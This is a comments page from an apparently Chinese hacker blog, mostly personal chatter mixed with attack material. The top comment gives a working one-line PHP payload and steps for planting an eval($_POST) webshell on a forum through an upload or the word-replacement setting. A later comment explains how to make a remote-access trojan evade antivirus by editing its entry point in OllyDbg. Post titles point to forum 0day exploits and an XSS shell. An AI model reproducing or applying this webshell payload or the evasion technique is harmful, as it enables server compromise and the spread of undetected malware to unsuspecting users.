Comments - H4x0r's Blog

[ 2007-04-08 08:14:22 ]

很多人呼唤
此三种方式不可行。。。

下面是9xiao 的方法：

如果是winnt系统直接添加一个.asa后缀的文件，（dz可以直接传asa）在后台找到文件上传的后的文件名，论坛发个phpshell，<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>然后看图修改包含银行查件文件名bank.php为上传的phpshell的相对路径，访问url：//hack.php?H_name=bank，就会在论坛根目录生成一个a.php的最小马。还有不用上传就是在词语替换那<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>插入，然后备份wordsfb字段记下相对路径。

[Last Modified By h4x0r, at 2007-04-08 08:16:19]

h4x0r : 请IT娱乐界的帅哥靓女们进来说句公道话啊!

[ 2007-04-05 07:56:53 ]

to x1140le:

”要命“ ？美女和男的相比下。是衬托出的美女噻

to dingking:

虽然不算个美女。但我是我喜欢的人啊。现在的女人不好找。特别是处女
哈哈哈```

to 精灵：

美女不算。但我对她是有真感觉的。

h4x0r : SoftArtisans FileUp viewsrc.asp remote script source disclosure exploit

[ 2007-01-24 19:54:43 ]

和新云那个类似..
只不过/../../跳出去的时候
"."改为编码了

h4x0r : 会话劫持攻击

[ 2007-01-24 10:10:34 ]

熬夜？

h4x0r : XSS shell v0.3.8

[ 2006-12-24 15:33:53 ]

不是hongkong来的.
0852来的

h4x0r : 动易的又一个漏洞

[ 2006-11-24 17:01:03 ]

听说这次动易出的洞还有好几个.
利用漏洞不是主要的.主要的是要会发掘ING..

[Last Modified By h4x0r, at 2006-11-24 17:01:49]

h4x0r : phpwind 0day Exp

[ 2006-11-11 00:47:46 ]

保存为.php
打开不会马上显示出结果
html里的内容是破解管理员密码后才会显示出

h4x0r : DEL

[ 2006-09-14 12:22:44 ]

嘿嘿.. 我进去的时候忘记把密码改复杂点了.
[lol]

[Last Modified By h4x0r, at 2006-09-14 12:36:26]

h4x0r : Pcshare2006深白破解版过部分杀毒软件

[ 2006-06-03 03:38:07 ]

貌似你很聪明

h4x0r : WMF网页木马生成器过全系统 [推荐]

[ 2006-05-28 21:13:44 ]

你用的什么软件分析？

h4x0r : 纪录下这几天的心情

[ 2006-05-22 08:18:45 ]

呵呵，你是怎么找到我这里来的啊》

h4x0r : 纪录下这几天的心情

[ 2006-05-21 18:56:52 ]

你用的正体？你是台湾的？

h4x0r : 我的最新照片!

[ 2006-05-15 13:56:09 ]

笑啥。。俺生来就是这样。小时候俺更漂亮咧。。。
听说，我出生的时候，在医院上空瓢了一朵云，马上化作一个“帅”

h4x0r : 我的最新照片!

[ 2006-05-14 16:49:19 ]

有人说第三张像周杰伦
你们怎么看？

h4x0r : 今天玩的好开心唷.................

[ 2006-05-03 17:13:01 ]

为什么？

h4x0r : 今天准备搞个大站

[ 2006-04-30 22:30:40 ]

我奶奶打电话给我了，叫我回家啊。
太晚了吧，明天有个朋友过生日，今天不能通宵。
怕明天没精力和他们玩啊。放心啦，明天一定搞啦。。。

h4x0r : 考试完了..

[ 2006-04-30 19:00:09 ]

不会吧？你也没老婆？那岂不大家都是《孤单北半球》？

h4x0r : 让木马程序变成图片

[ 2006-04-27 09:10:51 ]

广外幽灵3.55个人版本的防杀教程其实广外幽灵的防杀是在配置
文件名字为DATDA1 DATA2 最重要的是DATA1文件我们只要把这个文件做好就可以生成的
广外幽灵就防杀了！我们进行查杀我们使用卡吧最新版我们看见了都被杀了其实我们要做的就是把这两个文件进行脱壳我脱壳方式的演示我就不多说了现在我们对他进行修改吧
要做的修改有两中方法
第一点修改入口点
第二点对文件加花指令修改入口点
我们先进行第一种的进行演示吧！我们对DATA1 我们使用查壳进行查看第一中方法使用到的工具OLLYDBG 我们先载进DATA1 入口点 00003F20 我们在后面一位进一变为00003F21 点应用可以了！
我们进行查杀过了~
下面我们进行第二点进行演示刚才没有对文件进行备份我们对DATA1进行演示使用到的工具OLLYDBG和OLLYDBG下面进行演示 OLLYDBG载入文件我们只要把前面三行移动到可写的0区域然后进行入口点的修改我们先复制出来看我演示我慢慢来
复制前三行
00403F20 >/$ 55 PUSH EBP
00403F21 |. 8BEC MOV EBP,ESP
00403F23 |. 83C4 E4 ADD ESP,-1C
找0区域
004048D7 00 DB 00
这个地址就是了我们把前面的三行插进这里这里要说明的是jmp 使用到这个指令掉回去地址为00403F23 下面看的演示我们覆盖上去这里下面要使用到的工具就是PEditor 和前面的演示是一样的
我说错了~对文件加花指令修改入口点

h4x0r : 我最深爱的人....

[ 2006-04-08 21:51:53 ]

我真的很爱她，想和她有起啊 [yes]